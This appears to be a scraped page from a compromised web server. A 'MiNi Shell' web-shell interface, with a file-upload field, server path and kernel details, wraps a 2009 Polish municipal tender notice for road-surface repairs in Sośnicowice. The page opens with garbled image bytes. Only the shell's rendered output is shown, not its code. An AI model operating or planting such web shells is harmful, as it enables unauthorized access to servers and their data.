JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090121/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090121/24377-N-2009.html

<p class="kh_header"><b>Sośnicowice: REMONT CZĄSTKOWY NAWIERZCHNI BITUMICZNYCH DRÓG GMINNYCH W ROKU 2009 NA TERENIE GMINY SOŚNICOWICE</b><br>
<b>Numer ogłoszenia: 24377 - 2009; data zamieszczenia: 21.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sośnicowice , Rynek 19, 44-153 Sośnicowice, woj. śląskie, tel. 032 2387191 w. 330, faks 032 2387550.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sosnicowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT CZĄSTKOWY NAWIERZCHNI BITUMICZNYCH DRÓG GMINNYCH W ROKU 2009 NA TERENIE GMINY SOŚNICOWICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> REMONT CZĄSTKOWY NAWIERZCHNI BITUMICZNYCH DRÓG GMINNYCH W ROKU 2009 NA TERENIE GMINY SOŚNICOWICE

Szacunkowa ilość metrów kwadratowych nawierzchni bitumicznych wynosi:

W1 -  dla A1		-     400
W2 -  dla A2		-       50
W3 -  dla A3		-     150
W4 -  dla B1		-     200
W5 -  dla B2		-       50
W6 -  dla B3		-     300
W7 -  dla C1		-       50
W8 -  dla C2		-       50
W9 -  dla C3		-     450

Łącznie		 	     1700

gdzie:
A    - nakładka nawierzchni 
B    - nakładka nawierzchni z zaklinowaniem podbudowy
C    - nakładka nawierzchni z wymianą podbudowy			
	   
A1  - cena brutto za 1 m2 dla grubości nawierzchni 4 cm				
A2  - cena brutto za 1 m2 dla grubości nawierzchni 5 cm
A3  - cena brutto za 1 m2 dla grubości nawierzchni 6 cm					
						      
B1  - cena brutto za 1 m2 dla grubości nawierzchni 4 cm z zaklinowaniem podbudowy	
B2  - cena brutto za 1 m2 dla grubości nawierzchni 5 cm z zaklinowaniem podbudowy	
B3  - cena brutto za 1 m2 dla grubości nawierzchni 6 cm z zaklinowaniem podbudowy	

C1  - cena brutto za 1 m2 dla grubości nawierzchni 4 cm z wymianą podbudowy		
C2  - cena brutto za 1 m2 dla grubości nawierzchni 5 cm z wymianą podbudowy		
C3  - cena brutto za 1 m2 dla grubości nawierzchni 6 cm z wymianą podbudowy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.04.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział Wykonawcy, którzy spełniają wymagania opisane w art. 22 ust, 1 ustawy Prawo zamówień
    publicznych, w oparciu o przedłożone zaświadczenie.
2. Sposób dokonania oceny spełnienia wymaganych warunków:
1) przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
2) niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania; ofertę Wykonawcy
    wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca musi złożyć oświadczenie o spełnianiu wa?runków udziału w postępowaniu, zgodnie z art. 22 ust. 1 PZP oraz
    że nie podlega wykluczeniu na podstawie art. 24 ust. 1 PZP. 
2. Zamawiający żąda w celu potwierdzenia, że Wykonaw?ca posiada uprawnienie do wykonywania określonej działalno?ści 
    lub czynności i nie podlega wykluczeniu na podstawie art. 24 PZP następujących dokumentów:
a) odpisu z właściwego rejestru albo zaświadcze?nia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy
      wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wy?stawionego nie wcześniej niż 6
      miesięcy przed upływem terminu składania ofert. O akualności dokumentu decyduje wyłącznie
    data jego wystawienia, a nie data potwierdzenia jego aktualizacji,
b) wypełnionego i podpisanego formularza ofertowego,
c) zaparafowanego projektu umowy,
d) wypełnionego wykazu robót (załącznik nr 4)
3.  Zamawiający żąda, w celu potwierdzenia, że oferowana usługa, odpowiada określonym   
    przez niego wymaganiom, następujących dokumentów: 
a) wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie
       zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i
       wartością robotom budowlanym stanowiącym przedmiot zamówienia  z podaniem ich wartości oraz daty i miejsca
       wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
      Zamawiający dopuszcza, aby doświadczenie zawodowe po?twierdzone zostało
     referencjami bądź protokołami odbioru.
b) gwarancji - minimum 2 lata.

4


4. Jeżeli Wykonawcy wspólnie ubiegają się o zamówienie (konsorcjum), zgodnie z art. 23 w związku z art. 141 ustawy 
      Prawo  zamówień publicznych Zamawiający żąda:
1) wszyscy konsorcjanci winni obligatoryjnie dołączyć do oferty dokumenty wymagane od  Wykonawców wymie?nione 
     w pkt. 2. Dokumenty wymienione w pkt. 3 ppkt 1 składane mogą być wspólnie i takiej podlegać będą ocenie. 
2) wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem konsorcjum;
3) w przypadku wyboru przez Zamawiającego oferty złożonej przez konsorcjum, Wykonawcy tworzący konsorcjum
     zobowiązani będą najpóźniej przed zawarciem umowy na wyko?nanie zamówienia, do przedłożenia umowy konsorcjum;
4) umowa, o której mowa wyżej, winna zawierać w szczególności: oznaczenie stron, ceł działania, czas trwania umowy,
     zasady współdziałania, w tym zakres prac przewidzianych przez każdą ze stron oraz zasady dokony?wania rozliczeń.

5. Jeżeli Wykonawca ma siedzibę lub miejsce zamiesz?kania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów
     na potwierdzenie uprawnienia do wykonywa?nia określonej działalności Wykonawca postępuje zgodnie 
     z § 2 rozporządzenia Prezesa Rady Ministrów z 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać
     Zama?wiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. nr 87, póz. 605).

6. Zamawiający wymaga, aby żądane przez niego dokumenty zostały złożone w formie oryginału lub kserokopii
    poświadczonej za zgodność z oryginałem przez Wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sosnicowice.i-gmina.pl/przetargi-w-2009-r..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD MIEJSKI W SOŚNICOWICACH UL. RYNEK 19, 
44-153 SOŚNICOWICE, POK. NR 18 W GODZ. OD 8.00 DO 15.00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2009 godzina 10:00, miejsce: URZĄD MIEJSKI W SOŚNICOWICACH UL. RYNEK 19, 
44-153 SOŚNICOWICE,
SEKRETARIAT - POK. NR 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com